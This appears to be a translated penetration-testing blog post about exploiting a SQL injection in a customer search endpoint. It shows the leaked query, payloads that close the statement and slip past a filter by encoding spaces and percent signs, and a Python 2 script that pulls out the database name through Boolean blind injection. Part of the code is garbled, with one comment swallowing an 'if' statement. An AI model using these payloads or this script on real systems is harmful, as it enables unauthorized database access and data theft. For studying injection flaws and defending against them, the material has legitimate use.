Identify the problem
During this test, an injection point was found. Through the test, it was found that the return package contained sql statements, which confirmed that it could be injected and started this injection attempt.
First of all, we can confirm that this is a GET data call. I thought it was a simple error injection. It should be possible to directly use sqlmap to exploit the vulnerability, but the reality gave me a slap in the face. sqlmap can use this vulnerability at all, but my database statement actually appeared in the returned data packet, so I took out the returned database statement and started a little construction process.
The copied database statement:
SELECT count(0) FROM customer c WHERE c.dealership_id = ? AND c.active = true AND (c.full_name LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub1 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub2 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%')
Two, test command statement
After experiments, it is found that the error content is different, which indicates that the parameters can indeed affect the database statement. However, the returned content needs to be closed and the returned content cannot be used, so type injection forms such as error reporting can be excluded. There are only two types of injections that can be detected: time blinds and Boolean blinds are added directly after the target Test statement.
Construct the database statement:
%’){Test statement}AND(c. full_name like’%test
The return is successful, and the statement is closed (in addition, the database fuzzy query like %% is used). After testing, it is found that there is filtering. The single% cannot pass and the space cannot pass. The system will return 404. For the database statement that broke before, use% 25 and %20 bypass the filtering of individual% and spaces to construct the above database statement to complete the closure of the statement, successfully return 200, confirm that the normal data packet can be returned, and perform a Boolean blind injection test based on the correctness of the database statement .
Next, confirm the test statement
27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test
Match in the form of bitwise interception, confirm the database name
Three, tool ideas
3.1 Post data packet utilization
Use python’s data packet sending to batch test target content
Different from time-type blind injection, Boolean blind injection needs to confirm the problem according to the difference of the returned data packet
%0a(ascii(substr(database(),{1},1))={0})%0a
Use the find function to find the returned data characteristics and determine whether the injected data is successfully obtained
# coding:utf-8
import requests
import datetime
import time
headers = {
Header information, add by yourself
}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.'
database = ''
for j in range(1,11):
for i in range(49,125):
Url = 'https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test'
UrlFormat = Url.format(i,j) #format()Function usage
r = requests.get(UrlFormat,headers=headers)
d = r.content.find("Test") #Use the find function to find the characteristics of the returned data and determine whether the injected data is successfully obtained if d != -1:
print(i)
print chr(i)
database += chr(i)
print database
break
else:
pass
Fourth, future thoughts
For the future of the code, there are the following ideas
1. Add the function of directly calling the data package
2. Always modify the value of 0
3. Optimize the thread
4. Write the code for the GET method
5. Refactor the logic of the overall code
Reviews
There are no reviews yet.